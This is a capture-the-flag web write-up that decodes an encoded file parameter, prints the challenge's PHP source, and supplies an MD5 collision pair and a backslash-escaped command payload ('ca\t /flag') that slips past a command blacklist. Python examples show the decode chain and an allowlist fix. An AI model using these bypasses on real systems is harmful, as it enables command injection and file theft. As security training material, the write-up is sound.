<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>
<p>Opening the challenge shows the URL ?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd= ; I also viewed the page source.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>
<p>There is an "MD5 is funny" message here, which suggests the challenge most likely involves MD5.</p>
<p>I then captured the request; there was nothing special in the headers, so I tried starting from the URL.</p>
<p>First, base64-decode that parameter once.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>
<p>After one decode it still looks like base64, so I decoded it again.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>
<p>Hex-decoding that then gives:</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">555.png
</pre>
</div>
<p>Encode index.php using the same method:</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
</pre>
</div>
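<p>The decode and encode chain in Python, as an added example (not code from the write-up). One caveat it handles: PHP's base64_decode tolerates the missing "=" padding in the URL value, while Python's base64.b64decode raises on it, so the helper re-pads first. It also applies the server's own preg_replace, which strips "/" and so confines img to bare file names; server_view is a constructed name for that combined check.</p>

```python
import base64
import binascii
import re


def _b64decode_lenient(s: str) -> bytes:
    """Decode base64 the way PHP's base64_decode does: missing '=' padding is tolerated."""
    s = s.strip()
    return base64.b64decode(s + "=" * (-len(s) % 4))


def decode_img(param: str) -> str:
    """Reverse the server's chain: hex2bin(base64_decode(base64_decode($_GET['img'])))."""
    hex_text = _b64decode_lenient(_b64decode_lenient(param).decode("ascii")).decode("ascii")
    return binascii.unhexlify(hex_text).decode("utf-8")


def encode_img(filename: str) -> str:
    """Forward chain the server expects: bin2hex, then base64 twice."""
    hexed = binascii.hexlify(filename.encode("utf-8"))
    return base64.b64encode(base64.b64encode(hexed)).decode("ascii")


def server_sanitize(name: str) -> str:
    """Same preg_replace("/[^a-zA-Z0-9.]+/", "", $file) as the challenge source.
    Everything but letters, digits and dots is dropped, so '/' never survives and the
    parameter can only name a file in the web root."""
    return re.sub(r"[^a-zA-Z0-9.]+", "", name)


def server_view(param: str):
    """Full server-side handling of img: decode, sanitize, then the /flag/i refusal.
    Returns the file name the server would read, or None when it answers 'no flag'."""
    name = server_sanitize(decode_img(param))
    return None if re.search(r"flag", name, re.IGNORECASE) else name
```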
<p>Then enter it in the address bar.</p>
<p>Then view the source and decode the base64 string inside it:</p>
<div class="cnblogs_code">
<pre><?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?>
<html>
<style>
    body{
    background:url(./bj.png) no-repeat center center;
    background-size:cover;
    background-attachment:fixed;
    background-color:#CCCCCC;
    }
</style>
<body>
</body>
</html></pre>
</div>
<p>Combined with the earlier deduction, the key code is:</p>
<div class="cnblogs_code">
<pre>    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }</pre>
</div>
<p>This MD5 check calls for a strong MD5 collision (two different inputs with the same MD5 digest):</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
</pre>
</div>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
</pre>
</div>
<p>With just that, whatever is in cmd gets executed as a command.</p>
<p>So I used the following payload:</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>
<p>Because '\' is not filtered, it can be bypassed like this:</p>
<p>ls and l\s produce the same result when the command is executed.</p>
<p>I then found /flag in the root directory.</p>
<p>So the payload is:</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag
</pre>
</div>
<p>For this challenge, since sort and dir are not filtered either, dir can be used in place of ls for listing, and sort in place of cat.</p>
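<p>The filter and the fix side by side, as an added Python example (not from the write-up). BLACKLIST is the challenge's regex as PHP hands it to preg_match after processing the double-quoted string; shell_words shows what the shell makes of the same string, which is where the backslash trick lives; ALLOWED_COMMANDS and resolve_allowlisted are a constructed hardened replacement in which user input only selects a fixed argv and never reaches a shell.</p>

```python
import re
import shlex
import subprocess

# The challenge's blacklist as preg_match() sees it once PHP has processed the double-quoted
# source (\\ -> \, \\\\ -> \\, \" -> ", \\$ -> \$). Read as a regex, one alternative is
# `\|\\`: a pipe immediately FOLLOWED by a backslash. A backslash on its own is never
# matched, which is why ca\t and l\s pass. The bare `{|}|\(|\)` tail of the original
# duplicates earlier entries and is written escaped here with the same meaning.
BLACKLIST = re.compile(
    r"ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|"
    r"diff|file|echo|sh|'|\"|`|;|,|\*|\?|\|\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\$|"
    r"\[|\]|\{|\}|\(|\)|-|<|>",
    re.IGNORECASE,
)

# Constructed allowlist for the hardened version: the user picks a key, the server owns argv.
ALLOWED_COMMANDS = {"date": ["date", "-u"], "uptime": ["uptime"]}


def blacklist_allows(cmd: str) -> bool:
    """True when the original filter would pass the string on to the shell."""
    return BLACKLIST.search(cmd) is None


def shell_words(cmd: str) -> list:
    """What the shell executes: POSIX quote removal drops an unquoted backslash, so the
    filter's view of the string and the shell's view differ. Matching a raw string that
    a different interpreter will re-parse is the root cause, not the length of the word list."""
    return shlex.split(cmd)


def resolve_allowlisted(choice: str):
    """Hardened form: map user input to a fixed argv, or refuse with None."""
    return ALLOWED_COMMANDS.get(choice)


def run_allowlisted(choice: str) -> str:
    """argv list and shell=False: no shell parsing, no quote removal, nothing to escape."""
    argv = resolve_allowlisted(choice)
    if argv is None:
        return "forbid ~"
    return subprocess.run(argv, capture_output=True, text=True, check=False).stdout
```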